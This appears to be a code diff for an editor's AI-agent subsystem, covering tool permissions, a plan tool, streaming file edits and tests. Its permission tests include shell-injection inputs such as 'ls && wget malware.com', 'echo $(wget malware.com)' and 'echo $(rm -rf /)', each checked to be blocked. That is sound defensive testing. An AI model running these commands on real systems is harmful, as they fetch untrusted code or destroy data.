+ let agent = settings.agent.get_or_insert_default();
+ for pattern in sub_patterns {
+ match mode {
+ ToolPermissionMode::Allow => {
+ agent.add_tool_allow_pattern(&tool, pattern);
+ }
+ ToolPermissionMode::Deny => {
+ agent.add_tool_deny_pattern(&tool, pattern);
+ }
+ // If there's no matching pattern this will
+ // default to confirm, so falling through is
+ // fine here.
+ ToolPermissionMode::Confirm => (),
+ }
+ }
+ });
+ });
+ }
+ None => {
+ let tool = tool.to_string();
+ cx.update(|cx| {
+ update_settings_file(fs, cx, move |settings, _| {
+ settings
+ .agent
+ .get_or_insert_default()
+ .set_tool_default_permission(&tool, mode);
+ });
+ });
+ }
+ }
}
}
@@ -3818,6 +3913,15 @@ impl ToolCallEventStreamReceiver {
panic!("Expected terminal but got: {:?}", event);
}
}
+
+ pub async fn expect_plan(&mut self) -> acp::Plan {
+ let event = self.0.next().await;
+ if let Some(Ok(ThreadEvent::Plan(plan))) = event {
+ plan
+ } else {
+ panic!("Expected plan but got: {:?}", event);
+ }
+ }
}
#[cfg(any(test, feature = "test-support"))]
@@ -2,7 +2,6 @@ use crate::{DbThread, DbThreadMetadata, ThreadsDatabase};
use agent_client_protocol as acp;
use anyhow::{Result, anyhow};
use gpui::{App, Context, Entity, Global, Task, prelude::*};
-use std::collections::HashMap;
use util::path_list::PathList;
struct GlobalThreadStore(Entity<ThreadStore>);
@@ -11,7 +10,6 @@ impl Global for GlobalThreadStore {}
pub struct ThreadStore {
threads: Vec<DbThreadMetadata>,
- threads_by_paths: HashMap<PathList, Vec<usize>>,
}
impl ThreadStore {
@@ -31,7 +29,6 @@ impl ThreadStore {
pub fn new(cx: &mut Context<Self>) -> Self {
let this = Self {
threads: Vec::new(),
- threads_by_paths: HashMap::default(),
};
this.reload(cx);
this
@@ -97,16 +94,10 @@ impl ThreadStore {
let all_threads = database.list_threads().await?;
this.update(cx, |this, cx| {
this.threads.clear();
- this.threads_by_paths.clear();
for thread in all_threads {
if thread.parent_session_id.is_some() {
continue;
}
- let index = this.threads.len();
- this.threads_by_paths
- .entry(thread.folder_paths.clone())
- .or_default()
- .push(index);
this.threads.push(thread);
}
cx.notify();
@@ -122,15 +113,6 @@ impl ThreadStore {
pub fn entries(&self) -> impl Iterator<Item = DbThreadMetadata> + '_ {
self.threads.iter().cloned()
}
-
- /// Returns threads whose folder_paths match the given paths exactly.
- /// Uses a cached index for O(1) lookup per path list.
- pub fn threads_for_paths(&self, paths: &PathList) -> impl Iterator<Item = &DbThreadMetadata> {
- self.threads_by_paths
- .get(paths)
- .into_iter()
- .flat_map(|indices| indices.iter().map(|&index| &self.threads[index]))
- }
}
#[cfg(test)]
@@ -306,50 +288,4 @@ mod tests {
assert_eq!(entries[0].id, first_id);
assert_eq!(entries[1].id, second_id);
}
-
- #[gpui::test]
- async fn test_threads_for_paths_filters_correctly(cx: &mut TestAppContext) {
- let thread_store = cx.new(|cx| ThreadStore::new(cx));
- cx.run_until_parked();
-
- let project_a_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-a")]);
- let project_b_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-b")]);
-
- let thread_a = make_thread(
- "Thread in A",
- Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(),
- );
- let thread_b = make_thread(
- "Thread in B",
- Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap(),
- );
- let thread_a_id = session_id("thread-a");
- let thread_b_id = session_id("thread-b");
-
- let save_a = thread_store.update(cx, |store, cx| {
- store.save_thread(thread_a_id.clone(), thread_a, project_a_paths.clone(), cx)
- });
- save_a.await.unwrap();
-
- let save_b = thread_store.update(cx, |store, cx| {
- store.save_thread(thread_b_id.clone(), thread_b, project_b_paths.clone(), cx)
- });
- save_b.await.unwrap();
-
- cx.run_until_parked();
-
- thread_store.read_with(cx, |store, _cx| {
- let a_threads: Vec<_> = store.threads_for_paths(&project_a_paths).collect();
- assert_eq!(a_threads.len(), 1);
- assert_eq!(a_threads[0].id, thread_a_id);
-
- let b_threads: Vec<_> = store.threads_for_paths(&project_b_paths).collect();
- assert_eq!(b_threads.len(), 1);
- assert_eq!(b_threads[0].id, thread_b_id);
-
- let nonexistent = PathList::new(&[std::path::PathBuf::from("/nonexistent")]);
- let no_threads: Vec<_> = store.threads_for_paths(&nonexistent).collect();
- assert!(no_threads.is_empty());
- });
- }
}
@@ -2,13 +2,19 @@ use crate::AgentTool;
use crate::tools::TerminalTool;
use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules};
use settings::ToolPermissionMode;
-use shell_command_parser::extract_commands;
+use shell_command_parser::{
+ TerminalCommandValidation, extract_commands, validate_terminal_command,
+};
use std::path::{Component, Path};
use std::sync::LazyLock;
use util::shell::ShellKind;
const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \
harmful to be allowed, and cannot be overridden by settings.";
+const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \
+ allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \
+ ${VAR}, $(...), backticks, $((...)), <(...), and >(...). Resolve those values before calling terminal, or ask \
+ the user for the literal value to use.";
/// Security rules that are always enforced and cannot be overridden by any setting.
/// These protect against catastrophic operations like wiping filesystems.
@@ -256,7 +262,30 @@ impl ToolPermissionDecision {
return denial;
}
- let rules = match permissions.tools.get(tool_name) {
+ let rules = permissions.tools.get(tool_name);
+
+ // Check for invalid regex patterns before evaluating rules.
+ // If any patterns failed to compile, block the tool call entirely.
+ if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) {
+ return ToolPermissionDecision::Deny(error);
+ }
+
+ if tool_name == TerminalTool::NAME
+ && !rules.map_or(
+ matches!(permissions.default, ToolPermissionMode::Allow),
+ |rules| is_unconditional_allow_all(rules, permissions.default),
+ )
+ && inputs.iter().any(|input| {
+ matches!(
+ validate_terminal_command(input),
+ TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported
+ )
+ })
+ {
+ return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into());
+ }
+
+ let rules = match rules {
Some(rules) => rules,
None => {
// No tool-specific rules, use the global default
@@ -270,12 +299,6 @@ impl ToolPermissionDecision {
}
};
- // Check for invalid regex patterns before evaluating rules.
- // If any patterns failed to compile, block the tool call entirely.
- if let Some(error) = check_invalid_patterns(tool_name, rules) {
- return ToolPermissionDecision::Deny(error);
- }
-
// For the terminal tool, parse each input command to extract all sub-commands.
// This prevents shell injection attacks where a user configures an allow
// pattern like "^ls" and an attacker crafts "ls && rm -rf /".
@@ -407,6 +430,18 @@ fn check_commands(
}
}
+fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool {
+ // `always_allow` is intentionally not checked here: when the effective default
+ // is already Allow and there are no deny/confirm restrictions, allow patterns
+ // are redundant — the user has opted into allowing everything.
+ rules.always_deny.is_empty()
+ && rules.always_confirm.is_empty()
+ && matches!(
+ rules.default.unwrap_or(global_default),
+ ToolPermissionMode::Allow
+ )
+}
+
/// Checks if the tool rules contain any invalid regex patterns.
/// Returns an error message if invalid patterns are found.
fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option<String> {
@@ -560,6 +595,7 @@ mod tests {
message_editor_min_lines: 1,
tool_permissions,
show_turn_stats: false,
+ new_thread_location: Default::default(),
}
}
@@ -1066,6 +1102,107 @@ mod tests {
));
}
+ #[test]
+ fn invalid_substitution_bearing_command_denies_by_default() {
+ let decision = no_rules("echo $HOME", ToolPermissionMode::Deny);
+ assert!(matches!(decision, ToolPermissionDecision::Deny(_)));
+ }
+
+ #[test]
+ fn invalid_substitution_bearing_command_denies_in_confirm_mode() {
+ let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm);
+ assert!(matches!(decision, ToolPermissionDecision::Deny(_)));
+ }
+
+ #[test]
+ fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() {
+ let decision = no_rules("echo $HOME", ToolPermissionMode::Allow);
+ assert_eq!(decision, ToolPermissionDecision::Allow);
+ }
+
+ #[test]
+ fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() {
+ let mut tools = collections::HashMap::default();
+ tools.insert(
+ Arc::from(TerminalTool::NAME),
+ ToolRules {
+ default: Some(ToolPermissionMode::Allow),
+ always_allow: vec![],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ let permissions = ToolPermissions {
+ default: ToolPermissionMode::Confirm,
+ tools,
+ };
+
+ assert_eq!(
+ ToolPermissionDecision::from_input(
+ TerminalTool::NAME,
+ &["echo $(whoami)".to_string()],
+ &permissions,
+ ShellKind::Posix,
+ ),
+ ToolPermissionDecision::Allow
+ );
+ }
+
+ #[test]
+ fn old_anchored_pattern_no_longer_matches_env_prefixed_command() {
+ t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm();
+ }
+
+ #[test]
+ fn env_prefixed_allow_pattern_matches_env_prefixed_command() {
+ t("PAGER=blah git log --oneline")
+ .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"])
+ .is_allow();
+ }
+
+ #[test]
+ fn env_prefixed_allow_pattern_requires_matching_env_value() {
+ t("PAGER=more git log --oneline")
+ .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"])
+ .is_confirm();
+ }
+
+ #[test]
+ fn env_prefixed_allow_patterns_require_all_extracted_commands_to_match() {
+ t("PAGER=blah git log && git status")
+ .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"])
+ .is_confirm();
+ }
+
+ #[test]
+ fn hardcoded_security_denial_overrides_unconditional_allow_all() {
+ let decision = no_rules("rm -rf /", ToolPermissionMode::Allow);
+ match decision {
+ ToolPermissionDecision::Deny(message) => {
+ assert!(
+ message.contains("built-in security rule"),
+ "expected hardcoded denial message, got: {message}"
+ );
+ }
+ other => panic!("expected Deny, got {other:?}"),
+ }
+ }
+
+ #[test]
+ fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() {
+ let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow);
+ match decision {
+ ToolPermissionDecision::Deny(message) => {
+ assert!(
+ message.contains("built-in security rule"),
+ "expected hardcoded denial message, got: {message}"
+ );
+ }
+ other => panic!("expected Deny, got {other:?}"),
+ }
+ }
+
#[test]
fn shell_injection_via_double_ampersand_not_allowed() {
t("ls && wget malware.com").allow(&["^ls"]).is_confirm();
@@ -1085,14 +1222,14 @@ mod tests {
fn shell_injection_via_backticks_not_allowed() {
t("echo `wget malware.com`")
.allow(&[pattern("echo")])
- .is_confirm();
+ .is_deny();
}
#[test]
fn shell_injection_via_dollar_parens_not_allowed() {
t("echo $(wget malware.com)")
.allow(&[pattern("echo")])
- .is_confirm();
+ .is_deny();
}
#[test]
@@ -1112,12 +1249,12 @@ mod tests {
#[test]
fn shell_injection_via_process_substitution_input_not_allowed() {
- t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm();
+ t("cat <(wget malware.com)").allow(&["^cat"]).is_deny();
}
#[test]
fn shell_injection_via_process_substitution_output_not_allowed() {
- t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm();
+ t("ls >(wget malware.com)").allow(&["^ls"]).is_deny();
}
#[test]
@@ -1268,15 +1405,15 @@ mod tests {
}
#[test]
- fn nested_command_substitution_all_checked() {
+ fn nested_command_substitution_is_denied() {
t("echo $(cat $(whoami).txt)")
.allow(&["^echo", "^cat", "^whoami"])
- .is_allow();
+ .is_deny();
}
#[test]
- fn parse_failure_falls_back_to_confirm() {
- t("ls &&").allow(&["^ls$"]).is_confirm();
+ fn parse_failure_is_denied() {
+ t("ls &&").allow(&["^ls$"]).is_deny();
}
#[test]
@@ -19,6 +19,7 @@ mod streaming_edit_file_tool;
mod terminal_tool;
mod tool_edit_parser;
mod tool_permissions;
+mod update_plan_tool;
mod web_search_tool;
use crate::AgentTool;
@@ -44,6 +45,7 @@ pub use spawn_agent_tool::*;
pub use streaming_edit_file_tool::*;
pub use terminal_tool::*;
pub use tool_permissions::*;
+pub use update_plan_tool::*;
pub use web_search_tool::*;
macro_rules! tools {
@@ -132,5 +134,6 @@ tools! {
SaveFileTool,
SpawnAgentTool,
TerminalTool,
+ UpdatePlanTool,
WebSearchTool,
}
@@ -253,12 +253,14 @@ impl ContextServerRegistry {
let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event;
match status {
- ContextServerStatus::Starting => {}
+ ContextServerStatus::Starting | ContextServerStatus::Authenticating => {}
ContextServerStatus::Running => {
self.reload_tools_for_server(server_id.clone(), cx);
self.reload_prompts_for_server(server_id.clone(), cx);
}
- ContextServerStatus::Stopped | ContextServerStatus::Error(_) => {
+ ContextServerStatus::Stopped
+ | ContextServerStatus::Error(_)
+ | ContextServerStatus::AuthRequired => {
if let Some(registered_server) = self.registered_servers.remove(server_id) {
if !registered_server.tools.is_empty() {
cx.emit(ContextServerRegistryEvent::ToolsChanged);
@@ -266,7 +266,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -372,7 +375,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -241,7 +241,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -359,7 +362,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -301,7 +301,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -428,7 +431,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -1374,7 +1374,10 @@ mod tests {
event
.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
authorize_task.await.unwrap();
}
@@ -848,7 +848,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -273,7 +273,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -379,7 +382,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -896,7 +896,10 @@ mod test {
);
authorization
.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = read_task.await;
@@ -1185,7 +1188,10 @@ mod test {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let result = task.await;
@@ -523,7 +523,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let _result = task.await;
@@ -651,7 +654,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -518,7 +518,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
let _result = task.await;
@@ -646,7 +649,10 @@ mod tests {
);
auth.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
assert!(
@@ -727,7 +733,10 @@ mod tests {
let auth = event_rx.expect_authorization().await;
auth.response
- .send(acp::PermissionOptionId::new("deny"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("deny"),
+ acp::PermissionOptionKind::RejectOnce,
+ ))
.unwrap();
let output = task.await.unwrap();
@@ -10,21 +10,30 @@ use std::sync::Arc;
use crate::{AgentTool, ThreadEnvironment, ToolCallEventStream, ToolInput};
-/// Spawns an agent to perform a delegated task.
+/// Spawn a sub-agent for a well-scoped task.
///
-/// Use this tool when you want to:
-/// - Run multiple tasks in parallel.
-/// - Delegate a self-contained task where you only need the final outcome.
+/// ### Designing delegated subtasks
+/// - An agent does not see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message.
+/// - Subtasks must be concrete, well-defined, and self-contained.
+/// - Delegated subtasks must materially advance the main task.
+/// - Do not duplicate work between your work and delegated subtasks.
+/// - Do not use this tool for tasks you could accomplish directly with one or two tool calls.
+/// - When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself.
+/// - Avoid issuing multiple delegate calls for the same unresolved subproblem unless the new delegated task is genuinely different and necessary.
+/// - Narrow the delegated ask to the concrete output you need next.
+/// - For code-edit subtasks, decompose work so each delegated task has a disjoint write set.
+/// - When sending a follow-up using an existing agent session_id, the agent already has the context from the previous turn. Send only a short, direct message. Do NOT repeat the original task or context.
///
-/// Do NOT use this tool for tasks you could accomplish directly with one or two tool calls (e.g. reading a file, running a single command).
+/// ### Parallel delegation patterns
+/// - Run multiple independent information-seeking subtasks in parallel when you have distinct questions that can be answered independently.
+/// - Split implementation into disjoint codebase slices and spawn multiple agents for them in parallel when the write scopes do not overlap.
+/// - When a plan has multiple independent steps, prefer delegating those steps in parallel rather than serializing them unnecessarily.
+/// - Reuse the returned session_id when you want to follow up on the same delegated subproblem instead of creating a duplicate session.
///
-/// You will receive only the agent's final message as output.
-///
-/// **New session** (no session_id): Creates a new agent that does NOT see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message.
-///
-/// **Follow-up** (with session_id): Sends a follow-up to an existing agent session. The agent already has full context, so send only a short, direct message — do NOT repeat the original task or context. Examples: "Also update the tests", "Fix the compile error in foo.rs", "Retry".
-///
-/// - If spawning multiple agents that might write to the filesystem, provide guidance on how to avoid conflicts (e.g. assign each to different directories).
+/// ### Output
+/// - You will receive only the agent's final message as output.
+/// - Successful calls return a session_id that you can use for follow-up messages.
+/// - Error results may also include a session_id if a session was already created.
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
#[serde(rename_all = "snake_case")]
pub struct SpawnAgentToolInput {
@@ -118,7 +118,7 @@ pub struct Edit {
pub new_text: String,
}
-#[derive(Default, Debug, Deserialize)]
+#[derive(Clone, Default, Debug, Deserialize)]
struct StreamingEditFileToolPartialInput {
#[serde(default)]
display_description: Option<String>,
@@ -132,7 +132,7 @@ struct StreamingEditFileToolPartialInput {
edits: Option<Vec<PartialEdit>>,
}
-#[derive(Default, Debug, Deserialize)]
+#[derive(Clone, Default, Debug, Deserialize)]
pub struct PartialEdit {
#[serde(default)]
pub old_text: Option<String>,
@@ -314,12 +314,19 @@ impl AgentTool for StreamingEditFileTool {
) -> Task<Result<Self::Output, Self::Output>> {
cx.spawn(async move |cx: &mut AsyncApp| {
let mut state: Option<EditSession> = None;
+ let mut last_partial: Option<StreamingEditFileToolPartialInput> = None;
loop {
futures::select! {
partial = input.recv_partial().fuse() => {
let Some(partial_value) = partial else { break };
if let Ok(parsed) = serde_json::from_value::<StreamingEditFileToolPartialInput>(partial_value) {
+ let path_complete = parsed.path.is_some()
+ && parsed.path.as_ref() == last_partial.as_ref().and_then(|p| p.path.as_ref());
+
+ last_partial = Some(parsed.clone());
+
if state.is_none()
+ && path_complete
&& let StreamingEditFileToolPartialInput {
path: Some(path),
display_description: Some(display_description),
@@ -768,14 +775,6 @@ impl EditSession {
ensure_buffer_saved(&buffer, &abs_path, tool, cx)?;
- if matches!(mode, StreamingEditFileMode::Write) {
- tool.action_log.update(cx, |log, cx| {
- log.buffer_created(buffer.clone(), cx);
- });
- }
- tool.action_log
- .update(cx, |log, cx| log.buffer_read(buffer.clone(), cx));
-
let diff = cx.new(|cx| match mode {
StreamingEditFileMode::Write => Diff::manual(buffer.clone(), cx),
StreamingEditFileMode::Edit => Diff::new(buffer.clone(), cx),
@@ -789,6 +788,11 @@ impl EditSession {
}
}) as Box<dyn FnOnce()>);
+ tool.action_log.update(cx, |log, cx| match mode {
+ StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx),
+ StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx),
+ });
+
let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot());
let old_text = cx
.background_spawn({
@@ -1975,6 +1979,13 @@ mod tests {
let task = cx.update(|cx| tool.clone().run(input, event_stream, cx));
// Setup + single edit that stays in-progress (no second edit to prove completion)
+ sender.send_partial(json!({
+ "display_description": "Single edit",
+ "path": "root/file.txt",
+ "mode": "edit",
+ }));
+ cx.run_until_parked();
+
sender.send_partial(json!({
"display_description": "Single edit",
"path": "root/file.txt",
@@ -2637,7 +2648,10 @@ mod tests {
event
.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
authorize_task.await.unwrap();
}
@@ -3543,6 +3557,12 @@ mod tests {
let task = cx.update(|cx| tool.clone().run(input, event_stream, cx));
// Transition to BufferResolved
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "path": "root/file.txt",
+ }));
+ cx.run_until_parked();
+
sender.send_partial(json!({
"display_description": "Overwrite file",
"path": "root/file.txt",
@@ -3618,8 +3638,9 @@ mod tests {
// Verify buffer still has old content (no content partial yet)
let buffer = project.update(cx, |project, cx| {
let path = project.find_project_path("root/file.txt", cx).unwrap();
- project.get_open_buffer(&path, cx).unwrap()
+ project.open_buffer(path, cx)
});
+ let buffer = buffer.await.unwrap();
assert_eq!(
buffer.read_with(cx, |b, _| b.text()),
"old line 1\nold line 2\nold line 3\n"
@@ -3758,7 +3779,7 @@ mod tests {
assert!(
!changed.is_empty(),
"action_log.changed_buffers() should be non-empty after streaming edit,
- but no changed buffers were found \u{2014} Accept All / Reject All will not appear"
+ but no changed buffers were found - Accept All / Reject All will not appear"
);
}
@@ -3803,6 +3824,157 @@ mod tests {
);
}
+ #[gpui::test]
+ async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode(
+ cx: &mut TestAppContext,
+ ) {
+ let (tool, _project, _action_log, _fs, _thread) =
+ setup_test(cx, json!({"file.txt": "old_content"})).await;
+ let (sender, input) = ToolInput::<StreamingEditFileToolInput>::test();
+ let (event_stream, _receiver) = ToolCallEventStream::test();
+ let task = cx.update(|cx| tool.clone().run(input, event_stream, cx));
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "write"
+ }));
+ cx.run_until_parked();
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "write",
+ "content": "new_content"
+ }));
+ cx.run_until_parked();
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "write",
+ "content": "new_content",
+ "path": "root"
+ }));
+ cx.run_until_parked();
+
+ // Send final.
+ sender.send_final(json!({
+ "display_description": "Overwrite file",
+ "mode": "write",
+ "content": "new_content",
+ "path": "root/file.txt"
+ }));
+
+ let result = task.await;
+ let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else {
+ panic!("expected success");
+ };
+ assert_eq!(new_text, "new_content");
+ }
+
+ #[gpui::test]
+ async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode(
+ cx: &mut TestAppContext,
+ ) {
+ let (tool, _project, _action_log, _fs, _thread) =
+ setup_test(cx, json!({"file.txt": "old_content"})).await;
+ let (sender, input) = ToolInput::<StreamingEditFileToolInput>::test();
+ let (event_stream, _receiver) = ToolCallEventStream::test();
+ let task = cx.update(|cx| tool.clone().run(input, event_stream, cx));
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "edit"
+ }));
+ cx.run_until_parked();
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "edit",
+ "edits": [{"old_text": "old_content"}]
+ }));
+ cx.run_until_parked();
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "edit",
+ "edits": [{"old_text": "old_content", "new_text": "new_content"}]
+ }));
+ cx.run_until_parked();
+
+ sender.send_partial(json!({
+ "display_description": "Overwrite file",
+ "mode": "edit",
+ "edits": [{"old_text": "old_content", "new_text": "new_content"}],
+ "path": "root"
+ }));
+ cx.run_until_parked();
+
+ // Send final.
+ sender.send_final(json!({
+ "display_description": "Overwrite file",
+ "mode": "edit",
+ "edits": [{"old_text": "old_content", "new_text": "new_content"}],
+ "path": "root/file.txt"
+ }));
+ cx.run_until_parked();
+
+ let result = task.await;
+ let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else {
+ panic!("expected success");
+ };
+ assert_eq!(new_text, "new_content");
+ }
+
+ #[gpui::test]
+ async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) {
+ let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await;
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Allow;
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ // Create a new file via the streaming edit file tool
+ let (event_stream, _rx) = ToolCallEventStream::test();
+ let task = cx.update(|cx| {
+ tool.clone().run(
+ ToolInput::resolved(StreamingEditFileToolInput {
+ display_description: "Create new file".into(),
+ path: "root/dir/new_file.txt".into(),
+ mode: StreamingEditFileMode::Write,
+ content: Some("Hello, World!".into()),
+ edits: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+ let result = task.await;
+ assert!(result.is_ok(), "create should succeed: {:?}", result.err());
+ cx.run_until_parked();
+
+ assert!(
+ fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await,
+ "file should exist after creation"
+ );
+
+ // Reject all edits — this should delete the newly created file
+ let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx));
+ assert!(
+ !changed.is_empty(),
+ "action_log should track the created file as changed"
+ );
+
+ action_log
+ .update(cx, |log, cx| log.reject_all_edits(None, cx))
+ .await;
+ cx.run_until_parked();
+
+ assert!(
+ !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await,
+ "file should be deleted after rejecting creation, but an empty file was left behind"
+ );
+ }
+
async fn setup_test_with_fs(
cx: &mut TestAppContext,
fs: Arc<project::FakeFs>,
@@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024;
///
/// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error.
///
+/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use.
+///
/// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own.
///
/// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs.
@@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024;
/// Some commands can be configured not to do this, such as `git --no-pager diff` and similar.
#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)]
pub struct TerminalToolInput {
- /// The one-liner command to execute.
+ /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user.
pub command: String,
/// Working directory for the command. This must be one of the root directories of the project.
pub cd: String,
@@ -628,4 +630,824 @@ mod tests {
result
);
}
+
+ #[gpui::test]
+ async fn test_run_rejects_invalid_substitution_before_terminal_creation(
+ cx: &mut gpui::TestAppContext,
